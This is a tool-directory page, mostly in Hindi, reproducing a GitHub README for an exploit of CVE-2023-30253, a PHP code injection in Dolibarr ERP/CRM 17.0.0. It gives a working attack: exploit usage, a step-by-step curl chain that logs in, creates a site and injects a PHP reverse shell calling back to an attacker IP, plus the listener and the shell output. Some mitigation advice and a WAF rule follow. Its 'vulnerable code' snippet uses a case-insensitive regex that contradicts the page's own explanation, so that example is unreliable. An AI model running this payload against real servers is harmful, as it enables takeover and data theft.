Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-30253-exploit — CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 PHP कोड इंजेक्शन के माध्यम से RCE (शैक्षिक एक्सप्लॉइट) | Kitploit
उपकरण/GitHubGitHub/jeanback1/cve-2023-30253-exploit
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubjeanback1/cve-2023-30253-exploit

CVE-2023-30253-exploit

CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 PHP कोड इंजेक्शन के माध्यम से RCE (शैक्षिक एक्सप्लॉइट)

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 रिमोट कोड एक्ज़ीक्यूशन

Python 3.8+ License CVSS

Dolibarr ERP/CRM v17.0.0 के लिए PHP कोड इंजेक्शन एक्सप्लॉइट, जो Website/CMS मॉड्यूल के माध्यम से www-data उपयोगकर्ता के रूप में रिवर्स शेल प्राप्त करने की अनुमति देता है।

⚠️ केवल शैक्षिक उपयोग और अधिकृत ऑडिट के लिए।


📑 विषय-सूची

  • CVE-2023-30253 क्या है?
  • यह भेद्यता कैसे काम करती है?
  • प्रभाव
  • यह एक्सप्लॉइट क्या करता है?
  • आवश्यकताएँ
  • स्थापना
  • उपयोग
  • व्यावहारिक उदाहरण
  • एक्सप्लॉइट चरण-दर-चरण
  • शमन
  • संदर्भ

🔍 CVE-2023-30253 क्या है?

CVE-2023-30253, 17.0.1 से पहले के संस्करणों वाले Dolibarr ERP/CRM में PHP कोड इंजेक्शन (CWE-94: Improper Control of Generation of Code) की एक भेद्यता है।

इसे Swascan (अब Hacktivesecurity) की टीम ने मई 2023 में खोजा और रिपोर्ट किया। यह भेद्यता Website/CMS मॉड्यूल में स्थित है, जो प्रमाणित उपयोगकर्ताओं को Dolibarr के भीतर वेबसाइट बनाने और प्रबंधित करने की अनुमति देता है।


⚙️ यह भेद्यता कैसे काम करती है?

Dolibarr उपयोगकर्ताओं को Website मॉड्यूल के पृष्ठों की सामग्री में PHP कोड इंजेक्ट करने से रोकने के लिए एक फ़िल्टर लागू करता है। हालाँकि, इस फ़िल्टर में एक गंभीर दोष है: यह case-sensitive है।

root@kitploit:~
// Código vulnerable (simplificado) en Dolibarr 17.0.0
if (preg_match('/<\?php/i', $content)) {
    // Bloquea solo "<?php" en minúsculas exactas... ¿o no?
    die("PHP code detected!");
}

फ़िल्टर शाब्दिक रूप से लोअरकेस में <?php स्ट्रिंग की खोज करता है। लेकिन PHP ओपनिंग टैग के लिए अपरकेस और लोअरकेस के किसी भी संयोजन की अनुमति देता है। इसका अर्थ है:

एक्सप्लॉइट फ़िल्टर को बायपास करने के लिए <?PHP (अपरकेस में) का उपयोग करता है, लेकिन कोई भी वेरिएंट काम करता है।

इसके अलावा, फ़िल्टर केवल सामग्री को सहेजने के समय लागू होता है। पृष्ठ को सर्व करते समय, Dolibarr सामग्री को बिना अतिरिक्त सैनिटाइज़ेशन के PHP इंटरप्रेटर को भेजता है, जो <? ओपनिंग टैग वाले किसी भी कोड को निष्पादित करता है।


💥 प्रभाव

एक प्रमाणित हमलावर निम्नलिखित कर सकता है:

  • सर्वर पर रिमोट कमांड निष्पादन (RCE)
  • Dolibarr डेटाबेस तक पहुँच (ग्राहक, चालान, उपयोगकर्ता)
  • सिस्टम की संवेदनशील फ़ाइलें पढ़ना (/etc/passwd, कॉन्फ़िगरेशन)
  • सर्वर को आंतरिक हमलों के लिए पिवट पॉइंट के रूप में उपयोग करना
  • मैलवेयर, वेबशेल या स्थायी बैकडोर इंस्टॉल करना

यह गंभीर क्यों है? Dolibarr का उपयोग एंटरप्राइज़ ERP/CRM के रूप में किया जाता है। एक घुसपैठ ग्राहक डेटा, वित्त, अनुबंध और आंतरिक क्रेडेंशियल उजागर कर सकती है।


🛠️ यह एक्सप्लॉइट क्या करता है?

एक्सप्लॉइट पूरी प्रक्रिया को 5 चरणों में स्वचालित करता है:

root@kitploit:~
┌─────────────────────────────────────────────────────────┐
│                   CVE-2023-30253                       │
│                                                         │
│  1. Login          → Autenticarse en Dolibarr           │
│  2. Create Website → Crear un sitio web vacío           │
│  3. Create Page    → Crear una página en el sitio       │
│  4. Inject Shell   → Inyectar PHP reverse shell         │
│  5. Trigger        → Ejecutar el payload                │
│                                                         │
│  Resultado: 🎯 Shell reversa como www-data              │
└─────────────────────────────────────────────────────────┘

विशेषताएँ:

  • ✅ एंटी-CSRF टोकन का स्वचालित प्रबंधन
  • ✅ कुकीज़ के साथ स्थायी सत्र
  • ✅ pageid का स्वचालित पता लगाना
  • ✅ डीबगिंग के लिए वर्बोज़ मोड
  • ✅ रंगीन आउटपुट (बंद करने योग्य)
  • ✅ fsockopen + proc_open के माध्यम से रिवर्स शेल पेलोड

📋 आवश्यकताएँ

  • Python 3.8+
  • requests
  • beautifulsoup4

या बस:

root@kitploit:~
pip install -r requirements.txt

📦 स्थापना

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/jeanback1/CVE-2023-30253-exploit.git
cd CVE-2023-30253-exploit

# Instalar dependencias
pip install -r requirements.txt

🚀 उपयोग

root@kitploit:~
python exploit.py <target> <username> <password> <lhost> <lport> [opciones]

स्थितीय तर्क:

विकल्प:

विकल्पविवरण
-v, --verboseविस्तृत डीबग जानकारी दिखाता है
--no-colorआउटपुट में रंग निष्क्रिय करता है
-h, --helpसहायता और उदाहरण दिखाता है

🎯 व्यावहारिक उदाहरण

टर्मिनल 1 — रिवर्स शेल लिसनर प्रारंभ करें

root@kitploit:~
nc -lvnp 4444

टर्मिनल 2 — एक्सप्लॉइट चलाएँ

root@kitploit:~
python exploit.py http://crm.board.htb admin admin 10.10.14.5 4444 --verbose

अपेक्षित आउटपुट

root@kitploit:~
════════════════════════════════════════════════════════
 CVE-2023-30253 — Dolibarr 17.0.0 RCE Exploit
════════════════════════════════════════════════════════

  Target:   http://crm.board.htb
  User:     admin
  LHOST:    10.10.14.5
  LPORT:    4444
  Site ID:  s3a1f2bc

──────────────────────────────────────────────────

[10:45:12] Paso 1/5: Iniciando sesión...
[10:45:12]   ✓ Sesión iniciada correctamente

[10:45:13] Paso 2/5: Creando sitio web...
[10:45:13]   ✓ Sitio web 's3a1f2bc' creado

[10:45:13] Paso 3/5: Creando página en el sitio...
[10:45:13]   ✓ Página creada dentro del sitio

[10:45:14] Paso 4/5: Inyectando reverse shell → 10.10.14.5:4444...
[10:45:14]   ✓ Código PHP inyectado exitosamente

[10:45:14] Paso 5/5: Ejecutando payload (trigger)...

════════════════════════════════════════════════════════
  EXPLOTACIÓN COMPLETADA
════════════════════════════════════════════════════════

  Trigger URL:
  http://crm.board.htb/public/website/index.php?website=s3a1f2bc&pageref=s3a1f2bc

  Instrucciones:
  1. En otra terminal, inicia tu listener:
     nc -lvnp 4444
  2. Accede a la Trigger URL (el exploit ya lo hizo)
  3. Recibirás una shell reversa como www-data

टर्मिनल 1 — शेल प्राप्त हुई 🎯

root@kitploit:~
Listening on 0.0.0.0 4444
Connection received on 10.129.231.37 52846
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

🔬 एक्सप्लॉइट चरण-दर-चरण

यदि आप प्रक्रिया को मैन्युअल रूप से (स्क्रिप्ट के बिना) समझना चाहते हैं, तो यहाँ पूरा फ़्लो है:

1. प्रमाणीकरण

root@kitploit:~
# Obtener cookies y token CSRF
curl -c cookies.txt http://crm.board.htb/ > /dev/null

# Extraer token
TOKEN=$(curl -s -b cookies.txt http://crm.board.htb/ \
  | grep -oP 'name="anti-csrf-newtoken" content="\K[^"]+')

# Login
curl -b cookies.txt -c cookies.txt \
  -X POST "http://crm.board.htb/index.php?mainmenu=home" \
  -d "token=$TOKEN&actionlogin=login&loginfunction=loginfunction&username=admin&password=admin"

2. एक वेबसाइट बनाएँ

root@kitploit:~
TOKEN=$(curl -s -b cookies.txt \
  "http://crm.board.htb/website/index.php?action=createsite" \
  | grep -oP 'name="anti-csrf-newtoken" content="\K[^"]+')

curl -b cookies.txt -X POST \
  "http://crm.board.htb/website/index.php" \
  -d "token=$TOKEN&action=addsite&WEBSITE_REF=misitio&WEBSITE_TITLE=misitio&addcontainer=Create"

⚠️ सीखा गया सबक: सही action पैरामीटर addsite है, न कि add जैसा कि कुछ सार्वजनिक एक्सप्लॉइट्स में दिखाई देता है।

3. एक पृष्ठ बनाएँ

root@kitploit:~
TOKEN=$(curl -s -b cookies.txt \
  "http://crm.board.htb/website/index.php?website=misitio" \
  | grep -oP 'name="anti-csrf-newtoken" content="\K[^"]+')

curl -b cookies.txt -X POST \
  "http://crm.board.htb/website/index.php" \
  -d "token=$TOKEN&action=addcontainer&website=misitio&WEBSITE_TYPE_CONTAINER=page&WEBSITE_TITLE=TEST&addcontainer=Create"

4. PHP कोड इंजेक्ट करें

root@kitploit:~
TOKEN=$(curl -s -b cookies.txt \
  "http://crm.board.htb/website/index.php?website=misitio&pageid=1&action=editsource" \
  | grep -oP 'name="anti-csrf-newtoken" content="\K[^"]+')

PHP='<?PHP $s=fsockopen("10.10.14.5",4444);proc_open("/bin/sh -i",array(0=>$s,1=>$s,2=>$s),$p);?>'

curl -b cookies.txt -X POST \
  "http://crm.board.htb/website/index.php" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode "action=updatesource" \
  --data-urlencode "website=misitio" \
  --data-urlencode "PAGE_CONTENT=$PHP"

🔑 हमले की कुंजी: सही फ़ील्ड PAGE_CONTENT है, न कि WEBSITE_CONTENT। कई सार्वजनिक PoCs में यह गलती है।

5. पेलोड निष्पादित करें

root@kitploit:~
curl "http://crm.board.htb/public/website/index.php?website=misitio&pageref=misitio"

🛡️ शमन

इस भेद्यता से Dolibarr सर्वर की सुरक्षा के लिए:

अपडेट करें (अनुशंसित)

root@kitploit:~
# Actualizar a Dolibarr 17.0.1 o superior
# El parche corrige el filtro para detectar cualquier variante de <?php

Website मॉड्यूल निष्क्रिय करें

यदि आप Website/CMS मॉड्यूल का उपयोग नहीं करते हैं, तो इसे यहाँ से निष्क्रिय करें:

root@kitploit:~
Home → Setup → Modules → Website → Desactivar

WAF नियम (mod_security)

root@kitploit:~
# Bloquear cualquier variante de etiquetas PHP en el campo PAGE_CONTENT
SecRule ARGS:PAGE_CONTENT "@rx <\?php|< \?php|<\?PHP|<\?[pP][hH][pP]" \
  "id:1001,phase:2,deny,status:403,msg:'CVE-2023-30253 PHP Injection blocked'"

न्यूनतम विशेषाधिकार का सिद्धांत

  • सामान्य उपयोगकर्ताओं के लिए एडमिन खातों का उपयोग न करें
  • Website मॉड्यूल तक कौन पहुँच सकता है, इसे सीमित करें

📚 संदर्भ

  • NVD — CVE-2023-30253
  • Swascan Advisory — Dolibarr 17.0.0 Analysis
  • Dolibarr GitHub — पैच कमिट
  • CWE-94: Code Injection
  • Hacktivesecurity — मूल रिपोर्ट

📝 अस्वीकरण

यह प्रोजेक्ट शैक्षिक और सूचना सुरक्षा अनुसंधान उद्देश्यों के लिए बनाया गया है। स्पष्ट प्राधिकरण के बिना सिस्टम के विरुद्ध इस एक्सप्लॉइट का उपयोग अवैध और नैतिक रूप से निंदनीय है।

साइबर सुरक्षा पेशेवर के रूप में, मैं दृढ़ता से निम्नलिखित में विश्वास करता हूँ:

  • भेद्यताओं का जिम्मेदार प्रकटीकरण
  • प्राधिकरण के साथ नैतिक हैकिंग
  • सामूहिक सुरक्षा को बेहतर बनाने के लिए ज्ञान साझा करना

द्वारा निर्मित Jean Carlos
साइबर सुरक्षा छात्र | पेंटेस्टिंग | CTF प्लेयर
CVE-2021-3560 • CVE-2023-27163 • CVE-2024-46986 • CVE-2025-2304

टूल डाउनलोड करें
फ़ील्डमान
CVECVE-2023-30253
CVSS v3.18.8 (HIGH)
VectorAV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
प्रकारCWE-94 — Code Injection
प्रभावित सॉफ़्टवेयरDolibarr ERP/CRM < 17.0.1
विशेषाधिकारप्रमाणित उपयोगकर्ता (कोई भी भूमिका)
पैचDolibarr 17.0.1 — commit 4f6055c
टैगफ़िल्टर हुआ?PHP द्वारा निष्पादित?
<?php ... ?>✅✅
<?PHP ... ?>❌✅
<?Php ... ?>❌✅
<?pHp ... ?>❌✅
तर्कविवरणउदाहरण
targetDolibarr का आधार URLhttp://crm.board.htb
usernameDolibarr उपयोगकर्ताadmin
passwordDolibarr पासवर्डadmin
lhostआपका IP (जहाँ आप शेल प्राप्त करेंगे)10.10.14.5
lportआपका पोर्ट (जहाँ आप शेल प्राप्त करेंगे)4444